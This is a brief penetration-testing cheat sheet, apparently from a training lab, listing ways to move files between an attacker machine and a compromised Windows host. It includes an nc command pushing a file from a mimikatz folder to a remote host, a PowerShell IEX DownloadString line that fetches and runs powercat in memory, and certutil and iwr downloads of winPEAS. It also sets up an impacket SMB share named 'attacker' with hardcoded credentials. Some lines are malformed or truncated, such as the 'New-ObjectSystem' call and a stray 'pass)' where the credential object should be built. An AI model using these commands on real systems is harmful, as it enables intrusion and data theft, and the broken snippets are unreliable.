Transfer to Linux
From Linux or Windows
On the sending machine
nc 192.168.118.2 443 < C:\tools\mimikatz\x64\file.txt
Transfer to Windows
From Linux or Windows
On the receiving Windows machine:
PS C:\Users\dave> iwr -uri http://192.168.118.2/winPEASx64.exe -Outfile winPEAS.exe
PS C:\Users\dave> wget -uri http://192.168.118.2/winPEASx64.exe -OutFile winPEAS.exe
PS C:\Users\dave> IEX (New-ObjectSystem Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1")
PS C:\Users\dave> certutil -urlcache -split -f "http://192.168.118.2:8000/winPEASx64.exe" winPEAS.exe
From Linux
On the sending Linux machine:
impacket-smbserver attacker $(pwd) -smb2support -user bubbleman -password bubbleman
On the receiving Windows machine:
$pass = convertto-securestring 'bubbleman' -asplaintext -force
pass)
new-psdrive -name bubbleman -psprovider filesystem -credential $cred -root \10.10.14.7\attacker
cd bubbleman: